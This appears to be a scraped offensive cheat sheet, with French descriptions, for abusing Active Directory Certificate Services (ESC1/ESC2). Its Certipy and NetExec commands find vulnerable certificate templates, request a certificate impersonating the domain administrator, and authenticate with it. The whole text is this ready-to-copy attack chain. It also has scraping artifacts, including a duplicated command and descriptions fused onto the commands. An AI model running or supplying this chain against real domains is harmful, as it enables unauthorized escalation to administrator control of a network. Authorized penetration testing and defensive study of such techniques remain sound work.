Copy command
certipy find -u '$USER@$DOMAIN' -p '$PASS' -dc-ip $DC -vulnerableDescription: Détecter templates vulnérables ESC1/ESC2.
ESC
certipy find -u '$USER@$DOMAIN' -p '$PASS' -dc-ip $DC -vulnerableDescription: Détecter templates vulnérables ESC1/ESC2.
certipy req -u '$USER@$DOMAIN' -p '$PASS' -ca '$CA' -template '$TEMPLATE' -upn administrator@$DOMAINDescription: Abuser SAN/UPN si template le permet.
certipy auth -pfx administrator.pfx -dc-ip $DCDescription: Authentifier avec certificat compromis.
nxc ldap $TARGET -u $USER -p $PASS -M adcsDescription: Croiser résultat Certipy avec enum LDAP ADCS.